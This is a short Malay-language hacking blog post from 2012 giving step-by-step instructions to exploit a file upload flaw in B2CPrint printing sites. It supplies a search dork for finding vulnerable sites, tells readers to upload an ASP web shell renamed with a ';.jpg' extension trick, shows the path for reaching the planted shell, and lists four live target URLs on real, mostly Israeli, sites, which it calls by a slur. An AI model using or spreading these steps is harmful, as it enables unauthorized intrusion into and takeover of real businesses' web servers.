Monday, 2 July 2012

B2CPrint - Remote File Upload Vulnerability

Assalamualaikum dan salam sejahtera.Entry kali ini aku nak ajar korang exploit main upload2 lagi.best kan upload2?hahaha.ok JOM!
note : exploit ni banyak web israhell yang terdedah.hehe

1. Mula-mula cari web vuln guna dork :
inurl:upload.asp intext:B2CPrint Online Printing Solutions



2. Buka salah satu web.link dia macam ni :
http://www.Site.il/upload.asp

@
http://www.Site.il/abc/upload.asp


3. Seterusnya masuk kan maklumat2 korang (tipu2 je).
Selepas tu Choose file dan upload : 
shell.asp;.jpg
@
shell.asp;.gif


note : upload shell asp (umer rock,spider dll.)


Rujuk gambar :




Lepas tu click SUBMIT!


4. Untuk tengok hasil :
http://www.Site.il/files/images/Sh3ll.asp;.jpg

@
http://www.Site.il/abc/files/images/Sh3ll.asp;.jpg


DONE!


Live Demo :http://www.b2cprintshop.com/upload.asp 
http://www.printprint.co.il/upload.asp
http://www.b2cprint.co.il/collage/EN/upload.asp
http://www.spektrum.co.il/upload.asp

ok itu saja untuk kali ini!Happy hacking!
Assalamualaikum


Item Reviewed: B2CPrint - Remote File Upload Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com